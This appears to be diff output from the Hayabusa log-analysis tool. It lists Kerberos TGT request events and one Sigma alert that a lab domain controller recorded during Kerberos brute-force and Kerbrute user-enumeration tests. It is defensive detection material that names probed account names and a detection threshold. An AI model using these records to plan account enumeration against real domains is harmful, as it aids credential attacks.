+2021-12-02 23:48:16.342 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:16.956 +09:00,-,-,medium,InitAccess : PrivEsc,Valid Users Failing to Authenticate From Single Source Using Kerberos,[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:22 TargetUserName:HealthMailbox2cfa5bd/svc_adfs01/HealthMailboxf7e4358/HealthMailboxeb3dc3f/proabcdef/domadm/HealthMailboxebdc745/HealthMailboxa935ecd/vuln_scan/HealthMailboxf49e2c8/svc-ata/Svc-SQL-DB01/HealthMailboxa99e1bd/admin-te/svc_nxlog/HealthMailboxdabf0a3/HealthMailboxe8b0d98/adminupn42/HealthMailbox9a2d0da/HealthMailboxc9291f7/HealthMailbox0ab31b3/admin-hacker IpAddress:::ffff:10.23.123.11 timeframe:24h,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos.yml,-
+2021-12-02 23:48:17.267 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sgfg | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.271 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: g | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.274 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: dyfgdhbn | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.277 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xvtrz | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.281 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ar | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.284 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tary | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.287 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: bsfin | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.319 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: mgdi | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.323 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vdr | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.327 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tc | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.331 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: syvsdy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.334 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: s | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.337 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ysy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.341 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vrat | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.344 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vay | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.348 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vs | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.351 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: uydzry | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.354 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rey | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.357 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vase | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.360 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ryver | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.363 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: yvsyv | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.367 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: srey | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.370 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: b aer | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.373 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: yvas | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.376 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tbyt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.379 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: nini | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.382 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ugu | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.385 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,"User: m,og | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -",../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.389 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: go | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.392 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: nd | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.395 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: bdcy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.398 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rec | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.401 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.405 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: accrt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.408 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: wyt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.410 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xc | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.413 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.416 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ytuntsr | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.420 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vga | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.423 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tfay | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.426 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sef | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.430 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: gsdf | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.433 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sfs | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:23.180 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: HealthMailboxf49e2c8 | Svc: krbtgt | IP Addr: ::ffff:10.23.42.16 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-03 21:06:03.488 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Administrator | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:03.493 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Guest | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:03.497 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: DefaultAccount | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:03.510 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: krbtgt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:03.847 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admmig | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:04.904 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Test-ADM | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:04.910 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:06.986 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: $P51000-50I28MP5JB3E | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:07.006 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_27d255b6407743b08 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:07.010 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_2b6f1a51ac6c41b2a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:07.014 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_25e3b4425ffd47aab | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:07.021 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_8b9faa99d83446d1b | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:07.031 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_6aaeeb113c0c4af3a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:07.035 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_2f6964c8f421408ab | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
